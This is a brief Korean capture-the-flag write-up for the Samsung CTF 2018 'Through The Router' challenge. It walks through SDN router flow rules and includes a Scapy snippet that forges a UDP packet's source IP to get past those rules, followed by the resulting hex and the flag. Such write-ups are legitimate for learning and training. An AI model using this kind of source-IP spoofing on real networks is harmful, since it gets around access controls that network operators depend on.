Samsung CTF PreQuals 2018 - Through The Router (140 pts.)

Through The Router (140pts)

SDN과 관련된 문제다.

10.0.0.2에서 10.0.0.1로 패킷을 전송하는데 라우터를 통과해야 한다.

문제에서 준 rules를 먼저 우선순위 내림차순대로 적어보면 이렇다.

1
2
3
4
5
6
1. src=10.1.7.2 (sport 4444, dport 1111) FLOOD
2. src=10.1.7.8 (sport 5555) FLOOD
3. src=10.1.x.x (dst=10.0.0.1) NO ACTION
4. src=10.2.9.x (dst=10.0.0.2) FLOOD
5. src=10.1.7.x (sport 3333) FLOOD
6. src=10.0.2.x (dst=10.0.0.1, dport 53)

일단 10.0.0.1:22136에 도착해야 하므로 1번은 일단 생각하지 않았다. 곧 바로 2번을 시도해 보았다.

1
2
3
4
5
6
7
8
9
# src : 10.1.7.8:5555
# dst : 10.0.0.1:22136
# data : secret

>>> from scapy.all import *
>>> raw(IP(src="10.1.7.8", dst="10.0.0.1") /
... UDP(sport=5555, dport=22136) /
... "secret").encode('hex')
'450000220001000040115fc10a0107080a00000115b35678000e3c51736563726574'

패킷의 src ip를 조작함으로써 문제를 풀 수 있었다.

flag : SCTF{Sp00f_7h3_p4ck3t_70_dr1ll_pr1v4t3_n37w0rk}

Share